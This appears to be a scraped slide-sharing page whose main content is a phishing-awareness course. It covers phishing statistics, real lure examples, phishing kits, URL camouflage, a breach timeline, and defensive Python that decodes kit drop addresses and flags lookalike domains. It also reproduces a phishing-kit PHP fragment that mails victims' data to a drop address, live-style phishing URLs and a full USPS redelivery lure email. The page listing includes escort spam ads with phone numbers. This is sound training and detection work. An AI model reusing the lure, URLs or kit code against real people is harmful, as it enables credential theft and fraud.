Employee wellbeing at the workplace.pptxNirmalaLoungPoorunde1
 
CARE OF CHILD IN INCUBATOR..........pptx
CARE OF CHILD IN INCUBATOR..........pptxCARE OF CHILD IN INCUBATOR..........pptx
CARE OF CHILD IN INCUBATOR..........pptxGaneshChakor2
 
Hierarchy of management that covers different levels of management
Hierarchy of management that covers different levels of managementHierarchy of management that covers different levels of management
Hierarchy of management that covers different levels of managementmkooblal
 
Earth Day Presentation wow hello nice great
Earth Day Presentation wow hello nice greatEarth Day Presentation wow hello nice great
Earth Day Presentation wow hello nice greatYousafMalik24
 
internship ppt on smartinternz platform as salesforce developer
internship ppt on smartinternz platform as salesforce developerinternship ppt on smartinternz platform as salesforce developer
internship ppt on smartinternz platform as salesforce developerunnathinaik
 
DATA STRUCTURE AND ALGORITHM for beginners
DATA STRUCTURE AND ALGORITHM for beginnersDATA STRUCTURE AND ALGORITHM for beginners
DATA STRUCTURE AND ALGORITHM for beginnersSabitha Banu
 
Types of Journalistic Writing Grade 8.pptx
Types of Journalistic Writing Grade 8.pptxTypes of Journalistic Writing Grade 8.pptx
Types of Journalistic Writing Grade 8.pptxEyham Joco
 
Capitol Tech U Doctoral Presentation - April 2024.pptx
Capitol Tech U Doctoral Presentation - April 2024.pptxCapitol Tech U Doctoral Presentation - April 2024.pptx
Capitol Tech U Doctoral Presentation - April 2024.pptxCapitolTechU
 
Biting mechanism of poisonous snakes.pdf
Biting mechanism of poisonous snakes.pdfBiting mechanism of poisonous snakes.pdf
Biting mechanism of poisonous snakes.pdfadityarao40181
 
Pharmacognosy Flower 3. Compositae 2023.pdf
Pharmacognosy Flower 3. Compositae 2023.pdfPharmacognosy Flower 3. Compositae 2023.pdf
Pharmacognosy Flower 3. Compositae 2023.pdfMahmoud M. Sallam
 
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️9953056974 Low Rate Call Girls In Saket, Delhi NCR
 
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPTECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPTiammrhaywood
 
Introduction to AI in Higher Education_draft.pptx
Introduction to AI in Higher Education_draft.pptxIntroduction to AI in Higher Education_draft.pptx
Introduction to AI in Higher Education_draft.pptxpboyjonauth
 
Painted Grey Ware.pptx, PGW Culture of India
Painted Grey Ware.pptx, PGW Culture of IndiaPainted Grey Ware.pptx, PGW Culture of India
Painted Grey Ware.pptx, PGW Culture of IndiaVirag Sontakke
 

Recently uploaded (20)

Final demo Grade 9 for demo Plan dessert.pptx
Final demo Grade 9 for demo Plan dessert.pptxFinal demo Grade 9 for demo Plan dessert.pptx
Final demo Grade 9 for demo Plan dessert.pptx
 
Organic Name Reactions for the students and aspirants of Chemistry12th.pptx
Organic Name Reactions  for the students and aspirants of Chemistry12th.pptxOrganic Name Reactions  for the students and aspirants of Chemistry12th.pptx
Organic Name Reactions for the students and aspirants of Chemistry12th.pptx
 
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
 
How to Configure Email Server in Odoo 17
How to Configure Email Server in Odoo 17How to Configure Email Server in Odoo 17
How to Configure Email Server in Odoo 17
 
EPANDING THE CONTENT OF AN OUTLINE using notes.pptx
EPANDING THE CONTENT OF AN OUTLINE using notes.pptxEPANDING THE CONTENT OF AN OUTLINE using notes.pptx
EPANDING THE CONTENT OF AN OUTLINE using notes.pptx
 
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
 
Employee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptxEmployee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptx
 
CARE OF CHILD IN INCUBATOR..........pptx
CARE OF CHILD IN INCUBATOR..........pptxCARE OF CHILD IN INCUBATOR..........pptx
CARE OF CHILD IN INCUBATOR..........pptx
 
Hierarchy of management that covers different levels of management
Hierarchy of management that covers different levels of managementHierarchy of management that covers different levels of management
Hierarchy of management that covers different levels of management
 
Earth Day Presentation wow hello nice great
Earth Day Presentation wow hello nice greatEarth Day Presentation wow hello nice great
Earth Day Presentation wow hello nice great
 
internship ppt on smartinternz platform as salesforce developer
internship ppt on smartinternz platform as salesforce developerinternship ppt on smartinternz platform as salesforce developer
internship ppt on smartinternz platform as salesforce developer
 
DATA STRUCTURE AND ALGORITHM for beginners
DATA STRUCTURE AND ALGORITHM for beginnersDATA STRUCTURE AND ALGORITHM for beginners
DATA STRUCTURE AND ALGORITHM for beginners
 
Types of Journalistic Writing Grade 8.pptx
Types of Journalistic Writing Grade 8.pptxTypes of Journalistic Writing Grade 8.pptx
Types of Journalistic Writing Grade 8.pptx
 
Capitol Tech U Doctoral Presentation - April 2024.pptx
Capitol Tech U Doctoral Presentation - April 2024.pptxCapitol Tech U Doctoral Presentation - April 2024.pptx
Capitol Tech U Doctoral Presentation - April 2024.pptx
 
Biting mechanism of poisonous snakes.pdf
Biting mechanism of poisonous snakes.pdfBiting mechanism of poisonous snakes.pdf
Biting mechanism of poisonous snakes.pdf
 
Pharmacognosy Flower 3. Compositae 2023.pdf
Pharmacognosy Flower 3. Compositae 2023.pdfPharmacognosy Flower 3. Compositae 2023.pdf
Pharmacognosy Flower 3. Compositae 2023.pdf
 
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
 
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPTECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
 
Introduction to AI in Higher Education_draft.pptx
Introduction to AI in Higher Education_draft.pptxIntroduction to AI in Higher Education_draft.pptx
Introduction to AI in Higher Education_draft.pptx
 
Painted Grey Ware.pptx, PGW Culture of India
Painted Grey Ware.pptx, PGW Culture of IndiaPainted Grey Ware.pptx, PGW Culture of India
Painted Grey Ware.pptx, PGW Culture of India
 

How To Catch a Phish: User Awareness and Training

  • 1. How To Catch a Phish: User Awareness and Training Slide: 1 This online continuing education course is available through a professional courtesy provided by: Malcovery Security, LLC, 2400 Oxford Drive #302, Bethel Park, PA 15102. Phone: 855-625-2683. Email: sales@malcovery.com. Twitter: @malcovery. Facebook: Malcovery. LinkedIn: Malcovery. Google+: Malcovery. © Concise Courses USA. The material contained in this course was researched, assembled, and produced by Concise Courses USA and remains their property. Questions or concerns about the content of this course should be directed to the program instructor. “How To Catch a Phish: User Awareness and Training”
  • 2. Section 1: The Threat. Course written by Jeremy Faircloth (CISSP, Security+, CCNA, MCSE, MCP+I, A+)
  • 3. Section 1: The Threat. A Quick Overview of the Problem
    1. While phishing is an “old-fashioned” cyber security threat, attacks continue to increase. Corporations and their customers continue to experience phishing and malicious spam attacks; in fact, it is happening more than ever before. 37.3 million users experienced phishing attacks in 2013, an increase of over 87% in one year.
    2. The stakes are high for cybercrime victims. Banks and financial institutions, commerce organizations, universities and others are frequent victims of cyber attacks, which are a form of cybercrime. Remediation costs and long-term loss of brand loyalty hurt the company’s bottom line. It is estimated that one of every 200 phishing attacks is successful. The average cost of a phishing attack to the organization is upwards of $150,000. Those are significant costs (more on that in the next slide).
    3. Traditional methods simply aren’t working. Despite multiple layers of cybercrime defense and prevention (end-user education and training about phishing and spam, web filters, web gateway blacklists, takedown vendors), corporations and organizations continue to experience significant losses to malware, phishing, and other forms of cybercrime. The reason? Victims of phishing and malware have not been able to identify who the criminals are, or the scope of the damages they cause.
  • 4. Section 1: The Threat. Cyber Attack Costs. For every $1 in direct losses, a successful attack costs:
    1. Financial: $1.00 in direct losses
    2. Remediation: $2.10 in remediation costs
    3. Reputation: $6.40 in reputation costs
    “Customers are 42% less likely to do business with you if they are aware of phishing attacks against your brand.” (Cisco report: Email Attacks: This Time It’s Personal)
  • 5. Section 1: The Threat. New “CyberRisk in Banking” study (www.businesswire.com/news/Banks-Lack-Ammo-Fight-Cyberthreats-Report). According to 2013 research by American Banker, bank executives rated phishing as “very likely” to occur and as having a “high impact” on their organization.
  • 6. Section 1: The Threat. Phishing attacks, by the numbers (APWG Global Phishing Survey 1H2013): the average uptime of a phishing site is 44 hours 39 minutes, and the number of targeted brands is 720. “37.3 million users experienced phishing attacks last year, an increase of 87%” (Kaspersky Lab, June 2013).
  • 7. Section 1: The Threat. Phishing attacks, by the numbers (Microsoft Security Intelligence Report v.14): in the second half of 2012, 6.8% of all sent email was malware distribution and 4.9% of all sent email was phishing distribution. There was consensus among the 250 senior banking executives surveyed in the 2013 American Banker research that awareness of phishing was lacking.
  • 8. Section 2: Phishing Examples
  • 9. Section 2: Phishing Examples. Example 1: GoDaddy. This was a somewhat targeted attack. The criminals wanted to plant malware on the computers of known webmasters, so they sent an email in which each recipient saw that his own domain was about to be terminated. This is alarming for many people, since no one wants downtime on their site. The scam then persuades the user to enter details, which are emailed back to the attackers.
  • 10. Section 2: Phishing Examples. Example 2: Bank of Montreal. Sometimes you just can’t tell sites apart... spot the difference (if you can!).
  • 11. Section 2: Phishing Examples. Example 3: Canadian Imperial Bank of Commerce. Sometimes you just can’t tell sites apart... spot the difference (if you can!).
  • 12. Section 2: Phishing Examples. Example 4: Royal Bank of Canada. Here’s a great phishing attack for all the wrong reasons: this fake Royal Bank of Canada page asks users to re-activate their account “due to security concerns”. To the unsuspecting, this seems very convincing.
  • 13. Section 2: Phishing Examples. Example 5: HSBC Bank. A good phishing page will look identical to the real one (most criminals use “phishing kits”; more on that later).
  • 14. Section 2: Phishing Examples. Example 6: American Express. This is a very recent phishing attack that was picked up by the Malcovery Cyber Intelligence & Forensics System. It was a well-thought-out phishing campaign and process. Step 1 of 6: The subject line of the email was "Fraud Alert: Irregular Card Activity". The ‘From’ address was "American Express (fraud@aexp.com)". The highlighted link that claims it will take you to https://www.americanexpress.com/ actually goes to one of 419 URLs on one of 57 compromised web servers. Each index.html page the victim was sent to handed off to a redirector script that displayed a box saying "Connecting to server" while it tried to load one of three JavaScript files from three different locations.
  • 15. Section 2: Phishing Examples. Example 6: American Express (continued). Step 2 of 6: Soon afterwards the victim was asked for their user ID and password.
  • 16. Section 2: Phishing Examples. Example 6: American Express (continued). Step 3 of 6: Then their Social Security number, birthdate, mother’s maiden name, her birthdate, and a PIN.
  • 17. Section 2: Phishing Examples. Example 6: American Express (continued). Step 4 of 6: And then, of course, the card number...
  • 18. Section 2: Phishing Examples. Example 6: American Express (continued). Step 5 of 6: And the expiration date...
  • 19. Section 2: Phishing Examples. Example 6: American Express (continued). Step 6 of 6: And finally the visitor is awarded 5,000 Reward points as a “thank-you” and forwarded to the actual AmEx page. According to the Malcovery research, to gather the user IDs and passwords of a few hundred American Express card holders, the phisher was willing and able to break into SEVENTY web servers: 57 used for the links in the spam, 10 more for the JavaScript redirection scripts, and 3 for the actual phishing hosts. Quite an elaborate scheme, and impressive for all the wrong reasons.
  • 20. Section 2: Phishing Examples. In Summary. The information gathered during a phishing attempt can vary greatly. Depending on the focus of the attack, the phisher could be looking for account credentials, financial information, sensitive corporate information, or even confidential personal information. Phishing attacks for all of these types of information have been seen “in the wild” and are used to collect information that the attacker would not otherwise have access to. This information is then used for a variety of purposes. Personal information from individuals, including credit card data or banking details, can be used to commit fraud. An attacker can steal a person’s identity or impersonate them using confidential information such as social security numbers, birth dates, and answers to questions that are normally used to authenticate a person’s identity, such as their mother’s maiden name. On a more nefarious front, information gathered during phishing attempts can be used as part of a larger attack and leveraged to penetrate further through a company’s technology-based defenses. In short, phishing is an attempt to gather data that the phisher is not authorized to have, which can then be used for many illicit purposes.
  • 21. Section 3: Phishing Methodologies
  • 22. Section 3: Phishing Methodologies. In this section we discuss some of the basics of phishing to better understand what phishing is, why it is performed, and what the attacker can gain from it. Next, we identify some of the targets associated with phishing and how the attacker approaches those targets. Phishing techniques will be demonstrated, and you will see first-hand how easy it is to perform an effective phishing attack. Our final section focuses on what you can do about this problem and some techniques that can be used to combat phishing.
  • 23. Section 3: Phishing Methodologies. Benefits to the Phisher. So why would an attacker use phishing rather than other attack techniques? To start with, phishing is very easy. Much like traditional fishing with a rod, reel, and hook, phishing attacks can be carried out with very little effort. All the phisher has to do is plan out his phishing trip, put together some good bait and his gear, and then see if any phish are biting. This isn’t even an expensive guided trip with top-of-the-line gear and boats: most phishing is performed at very low cost using basic techniques, low-cost technology, and a little practice. While some traditional attack techniques can be very expensive to perform, phishing is a low-cost, high-return investment. Many phishing techniques rely on disposable email addresses, servers, and domain names, so the perpetrator can hide their identity very effectively. Attempting to gather forensic information about phishing attacks tends to lead investigators down rabbit holes where the actual attacker is practically impossible to identify. At most, the characteristics of the attack can be determined, and the disposable addresses and other indicators associated with the attack can be gathered for some level of future prevention. Phishing is also very difficult for end users to detect. With advanced phishing techniques, the messages used or the sites shown as part of the attack can look very real. In addition, other attacks or techniques can be used to make the phishing attack even more convincing by leveraging real information. We’ll talk about this a little further when we discuss phishing techniques. The worst part about phishing from the perspective of those trying to prevent it is its sheer effectiveness: phishing simply works. Many security practitioners talk about layered security or defense-in-depth, and these approaches combat traditional attacks very well. However, you can never underestimate the risk that people present to their own information or that of others. The most vulnerable part of any organization tends to be its people, and they are the true target of phishing attacks. So what does all of this add up to for the attacker? In business terms, phishing is an excellent value proposition: low cost, minimal risk, and high returns. Few attack techniques offer the same value to attackers, so phishing is a favorite technique for many of them.
  • 24. Section 3: Phishing Methodologies. Why is phishing so easy?
    • Phishing kits are easily and readily available
    • Domain registration takes seconds
    • Many sites are easy to exploit
    • Every takedown is another opportunity
    Phishers create tools and use methods that make it as easy on themselves as possible. Phishing kits exist that are so complete that all the phisher has to do is set their email address and upload the kit to a new or compromised site. For new domains, a phisher can register a domain privately in seconds. In fact, these registrations are usually free for the phisher, because they take advantage of the return policies of domain registrars: one notable registrar allows a domain name to be returned if you change your mind within three days of registering it, and three days is more than enough for a phisher. Aside from newly registered domains, phishers frequently use existing sites that have been compromised. This lets them ride on the site’s positive reputation rating and simply install their phishing kit somewhere within the site structure. For example, if WordPress is used, phishers will frequently hide their kit somewhere in the /wp-admin/ directory of the site. Generally, part of the phishing defense process is to notify the owner of a site that it has been compromised and is being used for phishing. However, if the phisher is actually the owner of the site, you are just telling them that they need to use another domain now. Effectively, the defense process tells the phisher when they need to change their attack!
  • 25. Section 3: Phishing Methodologies. Phishing Kits: easy to configure, easy to deploy, very effective... usually. Phishing kits make this type of attack incredibly easy for phishers. They are like being handed a fully stocked tackle box and a fishing pole with a baited hook already on the line. But what do they look like? Here is one example of the file contents of a phishing kit. If you look at the file dates, you will see that most of these files are older, with minor modifications over time. However, the confirm.php file is fairly recent and is newer than any of the other files in the kit. That implies that there is configurable data in that file that needs to be changed when the kit is deployed.
  • 26. Section 3: Phishing Methodologies. confirm.php. Most of this file is PHP code for the phishing confirmation page, but the section in bold contains an encoded email address. This is probably the portion that gets changed before the kit is uploaded. Since it is a base64-encoded value, we can quickly decode it and obtain the phisher’s drop address:
    $emailusr1 = base64_decode('c29mb3RleDJAZ21haWwuY29t');
    which decodes to sofotex2@gmail.com
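The same decoding, automated so that a kit can be triaged without executing any of its PHP. This is an added example, not code from the slides or from Malcovery: it scans PHP source for quoted base64 literals, decodes each one layer by layer (some kits encode the drop address twice to defeat a naive grep), and reports the email addresses found plus the number of mail() calls, which usually equals the number of recipients. The confirm.php text it scans is a constructed stand-in built around the literal shown on the slide; the second literal in it is that same value base64-encoded a second time.

```python
"""Static triage of a phishing kit's PHP: recover the base64-encoded drop
address without running the kit. Added example; the sample PHP below is
constructed around the literal shown on the slide."""
import base64
import binascii
import re
from typing import Dict, Optional

# Constructed stand-in for confirm.php. The first literal is the one from the
# slide; the second is the same value base64-encoded a second time.
SAMPLE_CONFIRM_PHP = r"""<?php
$emailusr1 = base64_decode('c29mb3RleDJAZ21haWwuY29t');
$emailusr2 = base64_decode(base64_decode('YzI5bWIzUmxlREpBWjIxaGFXd3VZMjl0'));
$subject = "Result from " . $_SERVER['REMOTE_ADDR'];
mail($emailusr1, $subject, $message, $headers);
mail($emailusr2, $subject, $message, $headers);
header("Location: https://www.example-bank.invalid/");
?>"""

# A quoted run of base64-alphabet characters, 16 or more long, optional padding.
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")
EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
MAIL_CALL = re.compile(r"\bmail\s*\(")


def decode_layers(token: str, max_depth: int = 5) -> Optional[str]:
    """Base64-decode repeatedly while the result is still valid base64 and
    printable text. Returns the innermost plaintext, or None if the token
    was not base64 at all."""
    current = token
    for _ in range(max_depth):
        try:
            text = base64.b64decode(current, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError, ValueError):
            break  # not base64 (or not text): we have reached the plaintext
        if not text.isprintable():
            break
        current = text
    return None if current == token else current


def extract_drop_addresses(php_source: str) -> Dict[str, object]:
    """Return every decodable literal, the email addresses found inside them,
    and how many mail() calls the kit makes."""
    decoded: Dict[str, str] = {}
    for match in B64_LITERAL.finditer(php_source):
        token = match.group(1)
        plain = decode_layers(token)
        if plain is not None:
            decoded[token] = plain
    emails = sorted({e for text in decoded.values() for e in EMAIL.findall(text)})
    return {
        "decoded": decoded,
        "emails": emails,
        "mail_calls": len(MAIL_CALL.findall(php_source)),
    }


if __name__ == "__main__":
    result = extract_drop_addresses(SAMPLE_CONFIRM_PHP)
    for token, plain in result["decoded"].items():
        print(f"{token} -> {plain}")
    print("drop addresses:", result["emails"])
    print("mail() calls:", result["mail_calls"])
```

Run it over every .php file in a captured kit; the drop addresses it prints are exactly the indicator that slide 27 pivots on, and they come out without the kit's code ever being executed.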
  • 27. Section 3: Phishing Methodologies. sofotex2@gmail.com. If we search the Malcovery PhishIQ database, we find that sofotex2@gmail.com was first seen on February 15, 2011 in a Bank of Montreal kit! The platform tells us that this individual (or group) used this URL: http://conneelybuilders.net/bmo-canada-online/online-cgi-data/
  • 28. Section 3: Phishing Methodologies. What does a Phisher (typically) Catch?
    • Credentials
    • Account Numbers
    • Personal Information
    • Technical Information
    • Financial Information
    • Compromised Systems
    With phishing being so easy, what does the phisher usually catch? Phishing kits and sites gather credentials, account numbers, personal information such as a mother’s maiden name, technical information about the target such as their browser details (which can be used to fool device-identification processes), financial information, and finally the compromise of systems. With data like this, the phisher can perform identity theft and impersonate the individual who has been phished. They could open new lines of credit, access existing financial accounts, and even access the victim’s email. That lets the attacker send phishing emails from the victim’s own account to people the victim knows, read any web site passwords the victim has stored in their email account, and hide notifications from the victim’s bank or other sites by deleting the messages before the victim sees them.
  • 29. Section 4: Phishing Targets
  • 30. Section 4: Phishing Targets. Choosing Targets.
    Broad Targets: randomly generated email addresses; gathered email address databases; verified email addresses
    Focused Targets: a company’s employees; a company’s customers; geographical locations
    Laser-Focused Targets: company officers; specific individuals; highly selective criteria
    Phishers can use a range of methods for targeting their phish. For email-based phishing attacks, the phishers can use broad techniques to build email lists that target thousands of individuals. This can be done using randomly generated email addresses, email addresses gathered through various marketing sites, or email harvesting. These broad targeting techniques hit thousands and thousands of email addresses daily. Perhaps you’ve seen some of the examples on the next few pages?
  • 31. Section 4: Phishing Targets. Phishing Targets: Examples. Here’s an email from Federal Express. You have a package coming to you, don’t you? Perhaps you’d like to get in touch with some old colleagues through LinkedIn? And who hasn’t placed an order with Amazon? All of these examples are real phishing attacks sent to broad targets.
  • 32. Section 4: Phishing Targets. Phishing Targets: Examples (continued). In some cases the phisher is more focused, targeting the employees of a specific company or that company’s customers; in other cases they target a specific geography. Targeting a particular organization or group this way is known as “spear-phishing”; when the targets are senior executives it is called “whaling”. An example would be sending emails to all addresses known to be within an area served by a specific utility provider. The phisher sends an email purporting to be from that provider to a demographic that is more likely to fall for the attack. It’s like marketing for bad guys. Calling all Verizon customers! “My Citi credit card statement doesn’t look right... let me click on that to find out what’s wrong.”
  • 33. Section 4: Phishing Targets. Camouflage.
    • Falsified sources: email domains, compromised web servers
    • Reasonable or similar domain names
    • Long URLs
    • DNS hijacking
    Most phishers use camouflage to hide from detection and to keep from being identified. A variety of techniques are employed, including falsifying the source of the email and using compromised web servers. Compromised web servers aren’t just used to host the phishing kit; they can also be used to send out the phishing emails. This lets the email come from a valid domain that may have a good reputation, rather than setting off alarms by coming from a recently registered or unusual domain. Here’s a tip: if you’re running a web server that does not send email, remove or disable the mail-sending functions on that host (the local mail transfer agent and, for PHP sites, the mail() function), so that a compromise cannot turn it into a spam relay. Many times, a phisher will use a domain name that is either reasonable or similar to the real site of the phishing victim. For example, “myaccountbenefits.com” or “bankofamerica-accountsecurity” seem like reasonable domain names but could be used for phishing. How about adding an extra character, as in “welllsfargo.com” with three “L”s? Internationalized domain names can also contain non-ASCII characters (encoded on the wire as “xn--” Punycode), so swapping in an accented vowel that looks like the original letter is another way to camouflage a phishing site.
  • 34. Section 4: Phishing Targets. Long URLs! Really long URLs are a favorite of phishers. Consider this URL: http://paypal.com.ogi-bin.webscr.cmd-flowers.chmod-login.30934836349034713461359135135webapps8mmp6r7r1paypal.cediapvenezuela.com/websc/update.php?cmd=_loginsubmit&dispatch=93750148177318734n31nd7as6asbasba7743434ndasd6556sad5as=03418asd6asd6asdhasd5 If, as a normal user, you have a slight degree of heightened awareness, you might take a look at the URL to ensure that it’s what you’re expecting. At first glance it looks like a PayPal URL with some normal passing of variable data. What most users won’t see is that the actual domain name (cediapvenezuela.com) sits all the way in the middle of this long string; everything before it is just a subdomain the phisher controls. While the standard advice from security practitioners is to hover over the link and see what domain pops up, that isn’t nearly as easy on mobile devices or tablets. Using a long URL like this is incredibly effective for phishing. The last camouflage technique we’ll talk about is DNS hijacking. This has been seen in a few different types of attacks recently and can be very effective. The two primary methods are to modify the target’s own DNS settings in some way, or to modify the DNS settings for a target site directly with its domain registrar. The first is usually done with some form of malware or remote access to the target system. The second works better with standard phishing attacks and makes use of vulnerabilities in registrars’ verification systems or of compromised administrator systems. For example, if a phisher manages to get malware onto a site administrator’s system, they could obtain credentials for the domain registrar, modify the DNS settings for the site’s domain, and use DNS hijacking to forward any requests for the site over to their phishing page.
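The checks a user is being asked to make by eye here (where the real domain sits in a long URL, whether the domain is a one-character or accented near-miss of a brand, whether the host contains non-ASCII characters) can be automated at a mail gateway or in a link-lookup tool. The script below is an added example, not code from the slides or from Malcovery. Its inputs are the PayPal URL above (with the deck's line break removed) and the USPS lure quoted in Section 5, plus constructed lookalikes; the brand list, the 60-character "long host" threshold and the rule that the registrable domain is the last two labels are assumptions for the demo (a production tool would consult the public suffix list).

```python
"""Pull the real host out of a phishing URL and compare it with the brands
being impersonated. Added example; BRANDS and LONG_HOST are assumptions."""
import unicodedata
from typing import Dict, List
from urllib.parse import urlsplit

# Brands to protect (assumed list; load your own in practice).
BRANDS = ("paypal", "wellsfargo", "bankofamerica", "usps")
LONG_HOST = 60  # arbitrary demo threshold for a suspiciously long hostname

# The PayPal URL quoted on this slide and the USPS lure quoted in Section 5.
PAYPAL_PHISH = (
    "http://paypal.com.ogi-bin.webscr.cmd-flowers.chmod-login."
    "30934836349034713461359135135webapps8mmp6r7r1paypal.cediapvenezuela.com"
    "/websc/update.php?cmd=_loginsubmit&dispatch="
    "93750148177318734n31nd7as6asbasba7743434ndasd6556sad5as=03418asd6asd6asdhasd5"
)
USPS_PHISH = ("http://www.usps.com.usg3o1.com/shipping/trackandconfirm.php"
              "?navigation=1&respLang=Eng&resp=10242012")


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch one-character lookalikes such as welllsfargo."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def fold(label: str) -> str:
    """Map a punycode or accented label to plain ASCII letters
    (wéllsfargo -> wellsfargo) so it can be compared with the ASCII brand."""
    decoded = label
    if label.startswith("xn--"):
        try:
            decoded = label.encode("ascii").decode("idna")
        except UnicodeError:
            pass
    stripped = unicodedata.normalize("NFKD", decoded)
    return "".join(c for c in stripped if not unicodedata.combining(c))


def analyze_url(url: str) -> Dict[str, object]:
    host = urlsplit(url).hostname or ""
    labels = host.split(".")
    # Assumption: the registrable domain is the last two labels. A real tool
    # would use the public suffix list so that co.uk-style domains work.
    registrable = ".".join(labels[-2:])
    sld = labels[-2] if len(labels) >= 2 else labels[0]
    subdomain = ".".join(labels[:-2])
    flags: List[str] = []
    # Brand name present in the throwaway subdomain part but not in the
    # domain the browser actually talks to: the long-URL trick on the slide.
    for brand in BRANDS:
        if brand in subdomain and brand != fold(sld):
            flags.append(f"brand_in_subdomain:{brand}")
    # Non-ASCII or punycode host: the accented-vowel camouflage.
    if not host.isascii() or any(l.startswith("xn--") for l in labels):
        flags.append("non_ascii_host")
    # Registrable domain one edit (or one accent) away from a protected brand.
    folded_sld = fold(sld)
    for brand in BRANDS:
        if sld != brand and levenshtein(folded_sld, brand) <= 1:
            flags.append(f"lookalike:{brand}")
    if len(host) > LONG_HOST:
        flags.append("long_host")
    return {"host": host, "registrable": registrable, "flags": sorted(flags)}


if __name__ == "__main__":
    for sample in (PAYPAL_PHISH, USPS_PHISH, "http://welllsfargo.com/login",
                   "http://wéllsfargo.com/", "https://www.wellsfargo.com/"):
        print(analyze_url(sample))
```

The registrable domain is what the user should have hovered for; reporting it next to the flags is what makes the result readable on a phone, where hovering is not an option.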
  • 35. Section 4: Phishing Targets. The Victims...
    • Financial impact: fraud loss, remediation costs
    • Reputation impact: loss of business, loss of credibility
    As a victim, there are obviously a number of impacts to the targeted organization. In the financial arena, it’s common to count the losses due to fraud and the cost to remediate; for example, the company that has been phished may have to pay for identity theft protection for customers who fell victim to the phishing attempts. There is also a substantial loss of reputation when a company is phished, which can lead to a loss of business, further hurting the company’s financial outlook, as well as a loss of credibility. Let’s look at some numbers. As discussed earlier, based on a recent report from Cisco, the costs of a successful phishing attack break down into direct financial impact, remediation costs, and reputation costs, forming the pyramid shown on this slide. Per the Cisco report, every dollar of direct financial impact (1 on the chart) comes to $9.50 in total costs once remediation (2, $2.10) and the impact to reputation (3, $6.40) are taken into account.
  • 36. Section 4: Phishing Targets. The Victims... an example: a South Carolina government agency. Customers are less likely to do business with a company if they have heard about phishing attacks against that company. Let’s look at an example from a different angle. In 2012, a breach occurred at a South Carolina government agency; the timeline is shown below. From a financial perspective, look at the final line: all other considerations aside, just paying for identity theft protection for affected individuals has cost over 12 million dollars so far. This is from a single phishing attack.
    • August 13, 2012: Department of Revenue employee opens a phishing email.
    • August 27, 2012: Hacker logs in via Citrix VPN using the phishing victim’s credentials.
    • August 29, 2012: Hacker runs utilities to steal passwords from six servers.
    • September 2-4, 2012: Hacker runs reconnaissance on 21 servers.
    • September 12, 2012: Hacker dumps data to a staging directory.
    • September 13-14, 2012: 74.7 gigabytes of data exfiltrated by the hackers.
    • October 10, 2012: State learns of the breach from the US Secret Service.
    • October 26, 2012: Breach disclosed to the public.
    So far, 1 million residents have signed up for credit monitoring, at a cost of $12 million to the state.
  • 37. Section 5: Performing Phishing Attacks
  • 38. Section 5: Performing Phishing Attacks. Tossing Bait.
    • Used to target large groups of individuals
    • Requires simple email address harvesting or generation
    • Uses many emails in the hope that a small percentage will yield positive results
    For this demonstration we’ll use the “tossing bait” technique. Basically, a large number of email addresses are gathered and a phishing email is sent to all of them. The goal is to hit as many people as possible and rely on the sheer number of emails sent to compensate for the low success rate on a percentage basis.
  • 39. Section 5: Performing Phishing Attacks. Tossing Bait Demonstration.
    1. Target: verified email addresses
    2. Bait: package delivery
    3. Cast: email with web site link
    For our phishing campaign, we’ll use verified email addresses as the target. For bait, why not tell our phish that we have a package for them? And we’ll cast this out with a link to a web site where we can harvest their information.
  • 40. Section 5: Performing Phishing Attacks. Tossing Bait Email.
    Dear Customer, We attempted to deliver your item at 10:16 am on October 24, 2012 and a notice was left. You may arrange redelivery by clicking the link below or pick up the item at the Post Office indicated on the notice. If this item is unclaimed after 15 days then it will be returned to the sender. The sender has requested that you receive a Track & Confirm update, as shown below. Label Number: 7007 3795 0147 6588 4478. Expected Delivery Date: October 24, 2012. Service Type: First-Class Certified Mail. Service(s): Delivery Confirmation. Status: Final Notice. To check the status of your mailing or arrange redelivery, please visit http://www.usps.com.usg3o1.com/shipping/trackandconfirm.php?navigation=1&respLang=Eng&resp=10242012 Regards!
